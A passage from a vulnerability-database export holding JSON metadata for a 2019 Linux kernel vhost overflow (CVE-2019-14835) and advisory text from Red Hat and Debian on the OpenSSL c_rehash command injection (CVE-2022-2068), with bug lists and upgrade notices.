      },
      {
        "db": "PACKETSTORM",
        "id": "154602"
      },
      {
        "db": "PACKETSTORM",
        "id": "154951"
      },
      {
        "db": "PACKETSTORM",
        "id": "154565"
      },
      {
        "db": "PACKETSTORM",
        "id": "155212"
      },
      {
        "db": "PACKETSTORM",
        "id": "154538"
      },
      {
        "db": "PACKETSTORM",
        "id": "154659"
      },
      {
        "db": "PACKETSTORM",
        "id": "154513"
      },
      {
        "db": "PACKETSTORM",
        "id": "154572"
      },
      {
        "db": "PACKETSTORM",
        "id": "154540"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-14835"
      }
    ]
  },
  "id": "VAR-201909-0695",
  "iot": {
    "_id": null,
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-146821"
      }
    ],
    "trust": 0.40555555
  },
  "last_update_date": "2026-03-09T20:38:57.948000Z",
  "problemtype_data": {
    "_id": null,
    "data": [
      {
        "problemtype": "CWE-120",
        "trust": 1.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-146821"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-14835"
      }
    ]
  },
  "references": {
    "_id": null,
    "data": [
      {
        "trust": 1.2,
        "url": "https://access.redhat.com/errata/rhsa-2019:2828"
      },
      {
        "trust": 1.2,
        "url": "https://access.redhat.com/errata/rhsa-2019:2830"
      },
      {
        "trust": 1.2,
        "url": "https://access.redhat.com/errata/rhsa-2019:2866"
      },
      {
        "trust": 1.2,
        "url": "https://access.redhat.com/errata/rhsa-2019:2901"
      },
      {
        "trust": 1.2,
        "url": "https://access.redhat.com/errata/rhsa-2019:2924"
      },
      {
        "trust": 1.1,
        "url": "https://seclists.org/bugtraq/2019/sep/41"
      },
      {
        "trust": 1.1,
        "url": "https://seclists.org/bugtraq/2019/nov/11"
      },
      {
        "trust": 1.1,
        "url": "https://www.debian.org/security/2019/dsa-4531"
      },
      {
        "trust": 1.1,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/yw3qnmpenpfegvtofpsnobl7jeijs25p/"
      },
      {
        "trust": 1.1,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/kqfy6jyfiq2vfq7qcsxpwtul5zdncjl5/"
      },
      {
        "trust": 1.1,
        "url": "https://access.redhat.com/errata/rhba-2019:2824"
      },
      {
        "trust": 1.1,
        "url": "https://access.redhat.com/errata/rhsa-2019:2827"
      },
      {
        "trust": 1.1,
        "url": "https://access.redhat.com/errata/rhsa-2019:2829"
      },
      {
        "trust": 1.1,
        "url": "https://access.redhat.com/errata/rhsa-2019:2854"
      },
      {
        "trust": 1.1,
        "url": "https://access.redhat.com/errata/rhsa-2019:2862"
      },
      {
        "trust": 1.1,
        "url": "https://access.redhat.com/errata/rhsa-2019:2863"
      },
      {
        "trust": 1.1,
        "url": "https://access.redhat.com/errata/rhsa-2019:2864"
      },
      {
        "trust": 1.1,
        "url": "https://access.redhat.com/errata/rhsa-2019:2865"
      },
      {
        "trust": 1.1,
        "url": "https://access.redhat.com/errata/rhsa-2019:2867"
      },
      {
        "trust": 1.1,
        "url": "https://access.redhat.com/errata/rhsa-2019:2869"
      },
      {
        "trust": 1.1,
        "url": "https://access.redhat.com/errata/rhsa-2019:2889"
      },
      {
        "trust": 1.1,
        "url": "https://access.redhat.com/errata/rhsa-2019:2899"
      },
      {
        "trust": 1.1,
        "url": "https://access.redhat.com/errata/rhsa-2019:2900"
      },
      {
        "trust": 1.1,
        "url": "https://usn.ubuntu.com/4135-1/"
      },
      {
        "trust": 1.1,
        "url": "https://usn.ubuntu.com/4135-2/"
      },
      {
        "trust": 1.1,
        "url": "https://lists.debian.org/debian-lts-announce/2019/09/msg00025.html"
      },
      {
        "trust": 1.1,
        "url": "https://lists.debian.org/debian-lts-announce/2019/10/msg00000.html"
      },
      {
        "trust": 1.1,
        "url": "http://www.openwall.com/lists/oss-security/2019/09/24/1"
      },
      {
        "trust": 1.1,
        "url": "http://www.openwall.com/lists/oss-security/2019/10/03/1"
      },
      {
        "trust": 1.1,
        "url": "http://www.openwall.com/lists/oss-security/2019/10/09/3"
      },
      {
        "trust": 1.1,
        "url": "http://www.openwall.com/lists/oss-security/2019/10/09/7"
      },
      {
        "trust": 1.1,
        "url": "http://packetstormsecurity.com/files/154572/kernel-live-patch-security-notice-lsn-0056-1.html"
      },
      {
        "trust": 1.1,
        "url": "http://packetstormsecurity.com/files/154951/kernel-live-patch-security-notice-lsn-0058-1.html"
      },
      {
        "trust": 1.1,
        "url": "http://packetstormsecurity.com/files/155212/slackware-security-advisory-slackware-14.2-kernel-updates.html"
      },
      {
        "trust": 1.1,
        "url": "http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20200115-01-qemu-en"
      },
      {
        "trust": 1.1,
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=cve-2019-14835"
      },
      {
        "trust": 1.1,
        "url": "https://security.netapp.com/advisory/ntap-20191031-0005/"
      },
      {
        "trust": 1.1,
        "url": "https://www.openwall.com/lists/oss-security/2019/09/17/1"
      },
      {
        "trust": 1.1,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00064.html"
      },
      {
        "trust": 1.1,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00066.html"
      },
      {
        "trust": 1.0,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-14835"
      },
      {
        "trust": 0.5,
        "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/security/vulnerabilities/kernel-vhost"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/security/cve/cve-2019-14835"
      },
      {
        "trust": 0.5,
        "url": "https://bugzilla.redhat.com/):"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/security/team/key/"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/security/team/contact/"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/security/updates/classification/#important"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/articles/11258"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-15030"
      },
      {
        "trust": 0.2,
        "url": "https://usn.ubuntu.com/4135-1"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-15031"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-14821"
      },
      {
        "trust": 0.2,
        "url": "https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-10905"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-14816"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-20976"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-14814"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-hwe/5.0.0-29.31~18.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-raspi2/4.4.0-1122.131"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-kvm/5.0.0-1017.18"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure/4.15.0-1059.64"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp/4.15.0-1044.46"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp/5.0.0-1017.17"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-raspi2/5.0.0-1017.17"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/5.0.0-29.31"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws/4.4.0-1094.105"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws-hwe/4.15.0-1050.52~16.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gke-4.15/4.15.0-1044.46"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-raspi2/4.15.0-1047.51"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws/4.15.0-1050.52"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/4.15.0-64.73"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oracle/4.15.0-1025.28~16.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure/5.0.0-1020.21~18.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-snapdragon/5.0.0-1021.22"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws/5.0.0-1016.18"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-kvm/4.4.0-1058.65"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-snapdragon/4.4.0-1126.132"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oem/4.15.0-1056.65"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-kvm/4.15.0-1046.46"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gke-5.0/5.0.0-1017.17~18.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oracle/4.15.0-1025.28"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp/4.15.0-1044.70"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/4.4.0-164.192"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-snapdragon/4.15.0-1064.71"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure/5.0.0-1020.21"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-hwe/4.15.0-64.73~16.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-14815"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-20856"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-11478"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-2181"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-10207"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-11477"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-3846"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-12614"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-21008"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-10126"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-14284"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-14283"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-11833"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-2054"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-0136"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-20961"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-14835"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-2215"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-17054"
      },
      {
        "trust": 0.1,
        "url": "http://slackware.com"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-16746"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-17055"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-17075"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-15118"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-17053"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-10906"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-10906"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-20976"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-17052"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-15117"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-17133"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-14816"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-15505"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-15098"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-16746"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-17054"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-2215"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-15118"
      },
      {
        "trust": 0.1,
        "url": "http://slackware.com/gpg-key"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-10905"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-17056"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-3900"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-15117"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-17056"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-14821"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-10638"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-15098"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-17075"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-17053"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-3900"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-10638"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-17055"
      },
      {
        "trust": 0.1,
        "url": "http://osuosl.org)"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-14814"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-17133"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-15505"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-17052"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/articles/2974891"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/4135-2"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-146821"
      },
      {
        "db": "PACKETSTORM",
        "id": "154514"
      },
      {
        "db": "PACKETSTORM",
        "id": "154602"
      },
      {
        "db": "PACKETSTORM",
        "id": "154951"
      },
      {
        "db": "PACKETSTORM",
        "id": "154565"
      },
      {
        "db": "PACKETSTORM",
        "id": "155212"
      },
      {
        "db": "PACKETSTORM",
        "id": "154538"
      },
      {
        "db": "PACKETSTORM",
        "id": "154659"
      },
      {
        "db": "PACKETSTORM",
        "id": "154513"
      },
      {
        "db": "PACKETSTORM",
        "id": "154572"
      },
      {
        "db": "PACKETSTORM",
        "id": "154540"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-14835"
      }
    ]
  },
  "sources": {
    "_id": null,
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-146821",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "154514",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "154602",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "154951",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "154565",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "155212",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "154538",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "154659",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "154513",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "154572",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "154540",
        "ident": null
      },
      {
        "db": "NVD",
        "id": "CVE-2019-14835",
        "ident": null
      }
    ]
  },
  "sources_release_date": {
    "_id": null,
    "data": [
      {
        "date": "2019-09-17T00:00:00",
        "db": "VULHUB",
        "id": "VHN-146821",
        "ident": null
      },
      {
        "date": "2019-09-18T21:22:40",
        "db": "PACKETSTORM",
        "id": "154514",
        "ident": null
      },
      {
        "date": "2019-09-25T17:55:27",
        "db": "PACKETSTORM",
        "id": "154602",
        "ident": null
      },
      {
        "date": "2019-10-23T18:32:10",
        "db": "PACKETSTORM",
        "id": "154951",
        "ident": null
      },
      {
        "date": "2019-09-23T18:26:18",
        "db": "PACKETSTORM",
        "id": "154565",
        "ident": null
      },
      {
        "date": "2019-11-08T15:37:19",
        "db": "PACKETSTORM",
        "id": "155212",
        "ident": null
      },
      {
        "date": "2019-09-20T14:57:38",
        "db": "PACKETSTORM",
        "id": "154538",
        "ident": null
      },
      {
        "date": "2019-09-30T04:44:44",
        "db": "PACKETSTORM",
        "id": "154659",
        "ident": null
      },
      {
        "date": "2019-09-18T21:22:34",
        "db": "PACKETSTORM",
        "id": "154513",
        "ident": null
      },
      {
        "date": "2019-09-23T18:31:46",
        "db": "PACKETSTORM",
        "id": "154572",
        "ident": null
      },
      {
        "date": "2019-09-20T14:57:53",
        "db": "PACKETSTORM",
        "id": "154540",
        "ident": null
      },
      {
        "date": "2019-09-17T16:15:10.980000",
        "db": "NVD",
        "id": "CVE-2019-14835",
        "ident": null
      }
    ]
  },
  "sources_update_date": {
    "_id": null,
    "data": [
      {
        "date": "2023-02-12T00:00:00",
        "db": "VULHUB",
        "id": "VHN-146821",
        "ident": null
      },
      {
        "date": "2024-11-21T04:27:27.790000",
        "db": "NVD",
        "id": "CVE-2019-14835",
        "ident": null
      }
    ]
  },
  "threat_type": {
    "_id": null,
    "data": "local",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "154514"
      },
      {
        "db": "PACKETSTORM",
        "id": "154951"
      },
      {
        "db": "PACKETSTORM",
        "id": "154513"
      }
    ],
    "trust": 0.3
  },
  "title": {
    "_id": null,
    "data": "Ubuntu Security Notice USN-4135-1",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "154514"
      }
    ],
    "trust": 0.1
  },
  "type": {
    "_id": null,
    "data": "overflow",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "154602"
      },
      {
        "db": "PACKETSTORM",
        "id": "154565"
      },
      {
        "db": "PACKETSTORM",
        "id": "154538"
      },
      {
        "db": "PACKETSTORM",
        "id": "154659"
      },
      {
        "db": "PACKETSTORM",
        "id": "154540"
      }
    ],
    "trust": 0.5
  }
}

VAR-202206-1428

Vulnerability from variot - Updated: 2026-03-09 20:23

In addition to the c_rehash shell command injection identified in CVE-2022-1292, further circumstances where the c_rehash script does not properly sanitise shell metacharacters to prevent command injection were found by code review. When the CVE-2022-1292 was fixed it was not discovered that there are other places in the script where the file names of certificates being hashed were possibly passed to a command executed through the shell. This script is distributed by some operating systems in a manner where it is automatically executed. On such operating systems, an attacker could execute arbitrary commands with the privileges of the script. Use of the c_rehash script is considered obsolete and should be replaced by the OpenSSL rehash command line tool. Fixed in OpenSSL 3.0.4 (Affected 3.0.0,3.0.1,3.0.2,3.0.3). Fixed in OpenSSL 1.1.1p (Affected 1.1.1-1.1.1o). Fixed in OpenSSL 1.0.2zf (Affected 1.0.2-1.0.2ze). (CVE-2022-2068). Description:

Red Hat Ceph Storage is a scalable, open, software-defined storage platform that combines the most stable version of the Ceph storage system with a Ceph management platform, deployment utilities, and support services.

Space precludes documenting all of these changes in this advisory. Bugs fixed (https://bugzilla.redhat.com/):

2031228 - CVE-2021-43813 grafana: directory traversal vulnerability 2044628 - CVE-2022-21673 grafana: Forward OAuth Identity Token can allow users to access some data sources 2115198 - build ceph containers for RHCS 5.2 release

For the oldstable distribution (buster), this problem has been fixed in version 1.1.1n-0+deb10u3.

For the stable distribution (bullseye), this problem has been fixed in version 1.1.1n-0+deb11u3.

We recommend that you upgrade your openssl packages.

For the detailed security status of openssl please refer to its security tracker page at: https://security-tracker.debian.org/tracker/openssl

Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org -----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmK4pF0ACgkQEMKTtsN8 TjYP5g//SyfB1W/vUNmgeSp2kKu3vt9CPwoXMK8nhTcA7iYhkxIJTFxAWDpn+4S7 W4kYyxMRFSIHKv4FLiLgi/Vzn4g1kB1UvKv05CFhEJqpWMyyRj6FdmebLlkLG0eE IGsZoQl9be+lRJ+E4oMMkrRkbJV5II7s69vdxFDh4893Ndx05GWWvXT5Doc5gFMi NoNabBH47GFU6aGDwVJU+xooBT6s4QMOrgVKYbxhM5PO98HQzk0zv0Z6YRx7FzKD hYMN/t6A8qj4zMQqJqM+44q9zpDryyolGLewvgOit1HFFnLlBf4wsdBvE7AGhvGs Lam5OXLhlwlQT6gBNd4XFAShdEZGLVF2DCgKzMh5cG5r2W10ewfHHyOR4CnkMQQP ePA8YvhVwSH3I5jOTS75A18LXpoRJKRXQuQ7v9di2C8qRZ0qnM95h0KzH9/UKyUc TmF09MTKWoFCkCtyzucdPnoyUPhdScJc08jcGJ37MCb8uKI4F5jVImLnHC6qS6Oc Gab3OPIDzS8I1rro0J1k8RJE1E8XvfCxgVAOoebn0mst8qT+38hqsTFykG+uq3dN sfhwI+E8iOeVOapyDVzxz8DfIkyBdnFsM4cg9VxDPOOllN+BknySqvzxu+aYpMFz K/D6g421XIIXPXD+sP/w1ENPV7LFobRR7KXUWvjS5l/Ir8dhPdQ= =tiWq -----END PGP SIGNATURE----- .

Description:

Logging Subsystem 5.5.0 - Red Hat OpenShift

Security Fix(es):

kubeclient: kubeconfig parsing error can lead to MITM attacks (CVE-2022-0759)
golang: compress/gzip: stack exhaustion in Reader.Read (CVE-2022-30631)
golang: out-of-bounds read in golang.org/x/text/language leads to DoS (CVE-2021-38561)
prometheus/client_golang: Denial of service using InstrumentHandlerCounter (CVE-2022-21698)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

For details on how to apply this update, which includes the changes described in this advisory, refer to:

https://access.redhat.com/articles/11258

Bugs fixed (https://bugzilla.redhat.com/):

2045880 - CVE-2022-21698 prometheus/client_golang: Denial of service using InstrumentHandlerCounter 2058404 - CVE-2022-0759 kubeclient: kubeconfig parsing error can lead to MITM attacks 2100495 - CVE-2021-38561 golang: out-of-bounds read in golang.org/x/text/language leads to DoS 2107342 - CVE-2022-30631 golang: compress/gzip: stack exhaustion in Reader.Read

JIRA issues fixed (https://issues.jboss.org/):

LOG-1415 - Allow users to tune fluentd LOG-1539 - Events and CLO csv are not collected after running oc adm must-gather --image=$downstream-clo-image LOG-1713 - Reduce Permissions granted for prometheus-k8s service account LOG-2063 - Collector pods fail to start when a Vector only Cluster Logging instance is created. LOG-2134 - The infra logs are sent to app-xx indices LOG-2159 - Cluster Logging Pods in CrashLoopBackOff LOG-2165 - [Vector] Default log level debug makes it hard to find useful error/failure messages. LOG-2167 - [Vector] Collector pods fails to start with configuration error when using Kafka SASL over SSL LOG-2169 - [Vector] Logs not being sent to Kafka with SASL plaintext. LOG-2172 - [vector]The openshift-apiserver and ovn audit logs can not be collected. LOG-2242 - Log file metric exporter is still following /var/log/containers files. LOG-2243 - grafana-dashboard-cluster-logging should be deleted once clusterlogging/instance was removed LOG-2264 - Logging link should contain an icon LOG-2274 - [Logging 5.5] EO doesn't recreate secrets kibana and kibana-proxy after removing them. LOG-2276 - Fluent config format is hard to read via configmap LOG-2290 - ClusterLogging Instance status in not getting updated in UI LOG-2291 - [release-5.5] Events listing out of order in Kibana 6.8.1 LOG-2294 - [Vector] Vector internal metrics are not exposed via HTTPS due to which OpenShift Monitoring Prometheus service cannot scrape the metrics endpoint. LOG-2300 - [Logging 5.5]ES pods can't be ready after removing secret/signing-elasticsearch LOG-2303 - [Logging 5.5] Elasticsearch cluster upgrade stuck LOG-2308 - configmap grafana-dashboard-elasticsearch is being created and deleted continously LOG-2333 - Journal logs not reaching Elasticsearch output LOG-2337 - [Vector] Missing @ prefix from the timestamp field in log record. LOG-2342 - [Logging 5.5] Kibana pod can't connect to ES cluster after removing secret/signing-elasticsearch: "x509: certificate signed by unknown authority" LOG-2384 - Provide a method to get authenticated from GCP LOG-2411 - [Vector] Audit logs forwarding not working. LOG-2412 - CLO's loki output url is parsed wrongly LOG-2413 - PriorityClass cluster-logging is deleted if provide an invalid log type LOG-2418 - EO supported time units don't match the units specified in CRDs. LOG-2439 - Telemetry: the managedStatus&healthStatus&version values are wrong LOG-2440 - [loki-operator] Live tail of logs does not work on OpenShift LOG-2444 - The write index is removed when the size of the index > diskThresholdPercent% * total size. LOG-2460 - [Vector] Collector pods fail to start on a FIPS enabled cluster. LOG-2461 - [Vector] Vector auth config not generated when user provided bearer token is used in a secret for connecting to LokiStack. LOG-2463 - Elasticsearch operator repeatedly prints error message when checking indices LOG-2474 - EO shouldn't grant cluster-wide permission to system:serviceaccount:openshift-monitoring:prometheus-k8s when ES cluster is deployed. [openshift-logging 5.5] LOG-2522 - CLO supported time units don't match the units specified in CRDs. LOG-2525 - The container's logs are not sent to separate index if the annotation is added after the pod is ready. LOG-2546 - TLS handshake error on loki-gateway for FIPS cluster LOG-2549 - [Vector] [master] Journald logs not sent to the Log store when using Vector as collector. LOG-2554 - [Vector] [master] Fallback index is not used when structuredTypeKey is missing from JSON log data LOG-2588 - FluentdQueueLengthIncreasing rule failing to be evaluated. LOG-2596 - [vector]the condition in [transforms.route_container_logs] is inaccurate LOG-2599 - Supported values for level field don't match documentation LOG-2605 - $labels.instance is empty in the message when firing FluentdNodeDown alert LOG-2609 - fluentd and vector are unable to ship logs to elasticsearch when cluster-wide proxy is in effect LOG-2619 - containers violate PodSecurity -- Log Exporation LOG-2627 - containers violate PodSecurity -- Loki LOG-2649 - Level Critical should match the beginning of the line as the other levels LOG-2656 - Logging uses deprecated v1beta1 apis LOG-2664 - Deprecated Feature logs causing too much noise LOG-2665 - [Logging 5.5] Sometimes collector fails to push logs to Elasticsearch cluster LOG-2693 - Integration with Jaeger fails for ServiceMonitor LOG-2700 - [Vector] vector container can't start due to "unknown field pod_annotation_fields" . LOG-2703 - Collector DaemonSet is not removed when CLF is deleted for fluentd/vector only CL instance LOG-2725 - Upgrade logging-eventrouter Golang version and tags LOG-2731 - CLO keeps reporting Reconcile ServiceMonitor retry error and Reconcile Service retry error after creating clusterlogging. LOG-2732 - Prometheus Operator pod throws 'skipping servicemonitor' error on Jaeger integration LOG-2742 - unrecognized outputs when use the sts role secret LOG-2746 - CloudWatch forwarding rejecting large log events, fills tmpfs LOG-2749 - OpenShift Logging Dashboard for Elastic Shards shows "active_primary" instead of "active" shards. LOG-2753 - Update Grafana configuration for LokiStack integration on grafana/loki repo LOG-2763 - [Vector]{Master} Vector's healthcheck fails when forwarding logs to Lokistack. LOG-2764 - ElasticSearch operator does not respect referencePolicy when selecting oauth-proxy image LOG-2765 - ingester pod can not be started in IPv6 cluster LOG-2766 - [vector] failed to parse cluster url: invalid authority IPv6 http-proxy LOG-2772 - arn validation failed when role_arn=arn:aws-us-gov:xxx LOG-2773 - No cluster-logging-operator-metrics service in logging 5.5 LOG-2778 - 